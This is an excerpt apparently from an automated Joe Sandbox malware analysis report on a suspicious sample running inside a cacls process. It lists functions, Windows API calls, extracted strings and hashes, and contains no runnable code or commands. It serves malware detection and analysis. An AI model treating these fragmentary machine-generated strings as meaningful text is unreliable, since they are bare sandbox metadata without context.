                                                                                          control_flow_graph 271 683e10-683e58 call 68b8d0 274 683e5e-683ed8 call 68b9b0 call 674890 call 6613e0 call 681fe0 271->274 275 683f64-683f6a 271->275 284 683ee0-683ef4 Sleep 274->284 285 683f55-683f5c 284->285 286 683ef6-683f08 284->286 285->284 287 683f5e 285->287 288 683f2a-683f43 call 686370 286->288 289 683f0a-683f28 call 6862d0 286->289 287->275 293 683f48-683f4b 288->293 289->293 293->285
                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(000007D0), ref: 00683EEB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID: i:4$net.dll$wininet.dll
                                                                                          • API String ID: 3472027048-2634764057
                                                                                          • Opcode ID: 9c19912619b969d4492f2daff6b2ffbad7a51720dc2e438e4577885ffa5e0c71
                                                                                          • Instruction ID: 9c7d85080211a6592f0ec15f422667234c434729d4364d9eeb9e877f0622ceff
                                                                                          • Opcode Fuzzy Hash: 9c19912619b969d4492f2daff6b2ffbad7a51720dc2e438e4577885ffa5e0c71
                                                                                          • Instruction Fuzzy Hash: C7315EB1A00705BBD714EFA4D881FEAB7B9EB88710F04861DF65D6B241D7706B40CBA5
                                                                                          Function 00670FFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 294 670ffc-671016 295 671019-671054 294->295 296 671056 295->296 297 6710b4-67110a call 674890 call 6613e0 call 681fe0 295->297 299 671057-671058 296->299 314 67110c-67111b PostThreadMessageW 297->314 315 67112a-671130 297->315 301 671084 299->301 302 67105a-67106c 299->302 301->299 303 671085-671087 301->303 302->295 310 67106e-671075 302->310 305 671091 303->305 306 671089-671090 303->306 306->305 312 671077-671080 310->312 313 671082-671083 310->313 312->313 313->301 314->315 316 67111d-671127 314->316 316->315
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00671117
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: t577G2K6$t577G2K6
                                                                                          • API String ID: 1836367815-2667467881
                                                                                          • Opcode ID: 0552f22b151b17f9e535a8ed6bb9008edb1782d23ebd6ebc5d6af9584400a9a1
                                                                                          • Instruction ID: e445449024bd1b5c24a59af9f94e575dadd7e345c6c4b1280d5f052382d19cb7
                                                                                          • Opcode Fuzzy Hash: 0552f22b151b17f9e535a8ed6bb9008edb1782d23ebd6ebc5d6af9584400a9a1
                                                                                          • Instruction Fuzzy Hash: 6B31D172A012C47B8701DB799C42DDDBBA9EE533A471480AEED489F201D5268E038BD1
                                                                                          Function 00671097 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 317 671097-6710b2 318 6710ba-6710d2 call 68c410 317->318 319 6710b5 call 68ba00 317->319 322 6710d8-67110a call 6613e0 call 681fe0 318->322 323 6710d3 call 674890 318->323 319->318 328 67110c-67111b PostThreadMessageW 322->328 329 67112a-671130 322->329 323->322 328->329 330 67111d-671127 328->330 330->329
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00671117
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: t577G2K6$t577G2K6
                                                                                          • API String ID: 1836367815-2667467881
                                                                                          • Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                                                          • Instruction ID: 4cff56163677e11cf423acc19e0c84f4092c1d2157cc8653e906528464cefe60
                                                                                          • Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                                                          • Instruction Fuzzy Hash: 1111E9B1D4025C7EDB11EBE48C82DEFBB7CEF027A4F018169F654AB141E6345E068BA5
                                                                                          Function 006710A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 331 6710a0-6710d2 call 68ba00 call 68c410 336 6710d8-67110a call 6613e0 call 681fe0 331->336 337 6710d3 call 674890 331->337 342 67110c-67111b PostThreadMessageW 336->342 343 67112a-671130 336->343 337->336 342->343 344 67111d-671127 342->344 344->343
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00671117
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: t577G2K6$t577G2K6
                                                                                          • API String ID: 1836367815-2667467881
                                                                                          • Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                                                          • Instruction ID: 9d7f8c09174cc03c32de988cecdfcb47f7edf0e232824cd0b580bd22a2668fe9
                                                                                          • Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                                                          • Instruction Fuzzy Hash: 1301C871D0024C7ADB11A6D48C81DEF7B7CDF426A4F048169FA14AB101E6245E0687B5
                                                                                          Function 0067F870 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InitializeUninitialize
                                                                                          • String ID: @J7<
                                                                                          • API String ID: 3442037557-2016760708
                                                                                          • Opcode ID: 58fcf34726c1358f6274ab2e4884b5cd5ecb42eb9839d8182d394bc5e53a52cd
                                                                                          • Instruction ID: c4cc1ab0fd65d5c1b98107a7009946e0e478be5ba10121abe83e00902a82b6b6
                                                                                          • Opcode Fuzzy Hash: 58fcf34726c1358f6274ab2e4884b5cd5ecb42eb9839d8182d394bc5e53a52cd
                                                                                          • Instruction Fuzzy Hash: 7F311075A0060AAFDB00DFD8C880DEEB7BABF88304B108559E519A7214D775AE458BA0
                                                                                          Function 006784EA Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00672040,0068834F,00685A0E,00672006), ref: 006784E3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorMode
                                                                                          • String ID:
                                                                                          • API String ID: 2340568224-0
                                                                                          • Opcode ID: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
                                                                                          • Instruction ID: e1c92f52fbb5661858fc7904cea8a9ae78811eefd6ccaf9344b7cdddf89d27d1
                                                                                          • Opcode Fuzzy Hash: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
                                                                                          • Instruction Fuzzy Hash: 4E110A719503047FEB50EBE0DC4AFEA73B9DB55360F00829DF90CAB281EB74AA448795
                                                                                          Function 00674890 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00674902
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                                                          • Instruction ID: 1a6054a4815d018329dea5a16b3bdd0f2a6bcfb26064dc5a1f521d0312f94421
                                                                                          • Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                                                          • Instruction Fuzzy Hash: B70112B5D0010DABDF50EAE4EC46FDDB7B99B54308F108295E91897241F631EB14CB91
                                                                                          Function 00689C70 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,0067867E,00000010,?,?,?,00000044,?,00000010,0067867E,?,?,?), ref: 00689CD0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateInternalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2186235152-0
                                                                                          • Opcode ID: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
                                                                                          • Instruction ID: c7059587e6df40b1d6c207ee8fafa950d81d68dfea0f3a11dc6f5c280a4e4209
                                                                                          • Opcode Fuzzy Hash: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
                                                                                          • Instruction Fuzzy Hash: 1101C0B2214208BBCB44DF99DC81EDB77AEAF8D714F108209FA09E3241D630F851CBA4
                                                                                          Function 00674958 Relevance: 1.5, APIs: 1, Instructions: 43libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00674902
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                                                          • Instruction ID: e6d3c953c4e5e05ee8de098f61bf75ea7a0cc31c12b7c6ee7bea5bc9ab83a134
                                                                                          • Opcode Fuzzy Hash: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                                                          • Instruction Fuzzy Hash: 25F02832E842098FDB00CFE8DC8ABD9B3B0FB56719F144AD9DA0D8B241E7626556CB45
                                                                                          Function 00669DF0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00669E35
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0
                                                                                          • Opcode ID: 8abc526603ee69cc07ae379c75a4a6867cf3df2a5e9c00712d5c962cde03cd73
                                                                                          • Instruction ID: 88e72c234da49c210ec36e1006db9fa158948d51f74d2d84f663828b832bb79f
                                                                                          • Opcode Fuzzy Hash: 8abc526603ee69cc07ae379c75a4a6867cf3df2a5e9c00712d5c962cde03cd73
                                                                                          • Instruction Fuzzy Hash: 26F0653338031436E36171E99C03FDB728D8F81BB1F14002AF70DEA2C5D9A1B90182B9
                                                                                          Function 00669DEC Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00669E35
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0
                                                                                          • Opcode ID: c6d51795fe5fb80f5b7edaeae963119bc0c18f6b7ddc29b8439bdab75854f7f8
                                                                                          • Instruction ID: 543b8abe9f55ba8e72dbc9865f1d7f5a103e13ee0b3d7cfab9cc1c857aa070c2
                                                                                          • Opcode Fuzzy Hash: c6d51795fe5fb80f5b7edaeae963119bc0c18f6b7ddc29b8439bdab75854f7f8
                                                                                          • Instruction Fuzzy Hash: D1F0653234025036E37166A58C43FEB675E8F95750F14011DF749EB2C5CAA1B901C7A8
                                                                                          Function 006784A7 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00672040,0068834F,00685A0E,00672006), ref: 006784E3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorMode
                                                                                          • String ID:
                                                                                          • API String ID: 2340568224-0
                                                                                          • Opcode ID: a7eb58f124f42faa32bd0b98e24c9cc65d6b44fed8b2e29aa4dd18ffd073b925
                                                                                          • Instruction ID: 37275439fb7f8a65e2766c196b35a3bf574da0ef4e41ab6d78cccf4d13467932
                                                                                          • Opcode Fuzzy Hash: a7eb58f124f42faa32bd0b98e24c9cc65d6b44fed8b2e29aa4dd18ffd073b925
                                                                                          • Instruction Fuzzy Hash: D7E092362402057BF610EBA0DC47F56739DCB02791F0482A8FE0CDB282EE65AB2097A5
                                                                                          Function 00689BE0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,00674101,000000F4), ref: 00689C1F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                                                          • Instruction ID: 57b0f1ee8b5480fbb759e2e40ae8d99ee2a9be01889b0ce102b9bf5c8cbaebfd
                                                                                          • Opcode Fuzzy Hash: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                                                          • Instruction Fuzzy Hash: 63E092712002047BD614EE99DC41FEB33ADEFC5710F004009FD08A7241CA74B951CBB9
                                                                                          Function 00689B90 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00671D39,?,006862C8,00671D39,00685A0E,006862C8,?,00671D39,00685A0E,00001000,?,?,?), ref: 00689BCC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                                                          • Instruction ID: 516babd6a6283b64c117f59c270d62863c7db3d2f868de8709ae7a124f59e465
                                                                                          • Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                                                          • Instruction Fuzzy Hash: ECE06D722002087BD654EE58DC41FDB33ADDFC9710F004409F909A7241CA71B911CBF8
                                                                                          Function 006786B9 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 006786EC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 2753a7d038357cc6f3c72076476afa14903284bd2399edb8ffc59166543d03fa
                                                                                          • Instruction ID: ec8fe145d0d3311246b029352883d8c4b2ce3f2aa670d33f3e97303edf4def54
                                                                                          • Opcode Fuzzy Hash: 2753a7d038357cc6f3c72076476afa14903284bd2399edb8ffc59166543d03fa
                                                                                          • Instruction Fuzzy Hash: 52E0DF752403043FEA24AA6CCC5AFA2339E5B08724F548654B95CDF3D6DE38FE024658
                                                                                          Function 006786C0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 006786EC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 15a8c1fbe4661d092a7777f04f65c76b4a3f90efd20042f133fff81cd82b29ad
                                                                                          • Instruction ID: 5e2a254a8a3f50d65c73a064bc003d4caf9142949cc2a843b2c5287ff2e04169
                                                                                          • Opcode Fuzzy Hash: 15a8c1fbe4661d092a7777f04f65c76b4a3f90efd20042f133fff81cd82b29ad
                                                                                          • Instruction Fuzzy Hash: 19E020352403043FE72466ACDC45FA1334D5B48724F444650B95CCF3D1DD38FD024558
                                                                                          Function 006784B0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00672040,0068834F,00685A0E,00672006), ref: 006784E3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorMode
                                                                                          • String ID:
                                                                                          • API String ID: 2340568224-0
                                                                                          • Opcode ID: 8dc3f67186c01a883a3194ad24f845b709415d137cd0f8e88734256b74fde265
                                                                                          • Instruction ID: 5085dfaa8f1e18d22cb41c083306ad8851e8d67f6b70037827ff96aff65e6765
                                                                                          • Opcode Fuzzy Hash: 8dc3f67186c01a883a3194ad24f845b709415d137cd0f8e88734256b74fde265
                                                                                          • Instruction Fuzzy Hash: 64D017723803053BE650A6E4CC07F56328D4B06790F054068BA48EB282E964BA0046A9
                                                                                          Function 02F22B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: bde58af0b62f96edf3d3a1688c7318a5fd0892f9e9962f31e2b23322c3531993
                                                                                          • Instruction ID: a0248b9b15e0efaca8cb9eb1be923b39716dabcdf1466bcf94874f091a40f95e
                                                                                          • Opcode Fuzzy Hash: bde58af0b62f96edf3d3a1688c7318a5fd0892f9e9962f31e2b23322c3531993
                                                                                          • Instruction Fuzzy Hash: 5EB09272D024D5CAEB12EB704B0CB1B7A00ABD1781F26C466E3460681E8B3CC095F276

                                                                                          Non-executed Functions

                                                                                          Function 032BDF2A Relevance: 56.5, Strings: 45, Instructions: 211COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17795722212.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_32b0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                          • API String ID: 0-3558027158
                                                                                          • Opcode ID: 6cdf6510e9a0c96c802cb82170c8c015373415e15c2748aa24174257426ba8d8
                                                                                          • Instruction ID: 307b118cd552a7bb835c1f0bf5d663982733d35e1c3d6536b73bffb587d9991c
                                                                                          • Opcode Fuzzy Hash: 6cdf6510e9a0c96c802cb82170c8c015373415e15c2748aa24174257426ba8d8
                                                                                          • Instruction Fuzzy Hash: DD914FF04182988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                                                                          Function 02F17550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02F54507
                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02F5454D
                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 02F54592
                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02F54530
                                                                                          • ExecuteOptions, xrefs: 02F544AB
                                                                                          • Execute=1, xrefs: 02F5451E
                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02F54460
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                          • API String ID: 0-484625025
                                                                                          • Opcode ID: 423c321cd1180944d4715242dec11f4019a918f730713cad5c2fe348b51c9939
                                                                                          • Instruction ID: 30b22da2ad1e957247e6583665510450f01024db670bf6d881202a8e60e34ca8
                                                                                          • Opcode Fuzzy Hash: 423c321cd1180944d4715242dec11f4019a918f730713cad5c2fe348b51c9939
                                                                                          • Instruction Fuzzy Hash: 3251EA32A402196AEF10BFA4DD95FBDB3A9EF04384F5404A9DB09A7281EB709E55CF50
                                                                                          Function 032B0388 Relevance: 7.6, Strings: 6, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17795722212.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_32b0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: |de$|de$|de$|de$|de$|de
                                                                                          • API String ID: 0-3287866246
                                                                                          • Opcode ID: e6d338e7b14db9c33ec4048beedf938403ba15f5c62fb8eaccc9d8e066023ef1
                                                                                          • Instruction ID: 561acb2954a9b814e6369cc21d368d3e5a81bcdd8f7ebe6fa30874b78ceaad6a
                                                                                          • Opcode Fuzzy Hash: e6d338e7b14db9c33ec4048beedf938403ba15f5c62fb8eaccc9d8e066023ef1
                                                                                          • Instruction Fuzzy Hash: 1A216A70924B4E8FCF40EFA8D485AEEBBB0FB19300F00855AD549E7221D7349245CBD2
                                                                                          Function 02EE9046 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$@$@wv
                                                                                          • API String ID: 0-2230787357
                                                                                          • Opcode ID: ebbba05c893ed2e6fb5ae57b740c7faafee32a01d8dcc94c6b80c7f74969f3e5
                                                                                          • Instruction ID: 2c1c9f56cf395d1eee43e71c0a032c7873c7beb0e50d55436c3f37989c9f3943
                                                                                          • Opcode Fuzzy Hash: ebbba05c893ed2e6fb5ae57b740c7faafee32a01d8dcc94c6b80c7f74969f3e5
                                                                                          • Instruction Fuzzy Hash: 41813C71D402699BDB35CB54CD44BEEB7B9AF04754F0081EAEA0AB7251D7709E84CF60